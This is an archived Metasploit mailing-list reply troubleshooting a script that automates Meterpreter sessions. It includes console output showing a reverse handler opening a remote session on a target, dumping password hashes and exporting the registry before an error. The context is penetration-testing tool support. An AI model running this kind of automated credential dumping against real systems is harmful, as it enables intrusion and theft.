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Automating Meterpreter

From: go.hawaii at (Jason B.)
Date: Tue, 18 Nov 2008 13:28:32 +0100

Hi H D,

I tried it out and get some error messages:

mmsf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Starting the payload handler...
[*] Started reverse handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] New session on A.B.C.D:1254...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*] Exception: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: 2 
/pentest/exploits/framework3/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:157:in `execute'(eval):112:in 
`m_exec'(eval):211:in `on_session'(eval):207:in `each'(eval):207:in `on_session'(eval):88:in 
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:125:in `run'./msfconsole:78
[*] Meterpreter session 1 opened (E.F.G.H:8080 -> A.B.C.D.:1254)

-------- Original-Nachricht --------
Datum: Mon, 17 Nov 2008 15:13:16 -0600
Von: H D Moore <hdm at>
An: framework at
Betreff: [framework] Automating Meterpreter

I took a quick stab at documenting how to automate metepreter sessions in 
situations where you are exploiting many users at once. Max plans on a 
releasing a much better plugin/script backend than the example I show 
here, but this should get folks started in the short-term.


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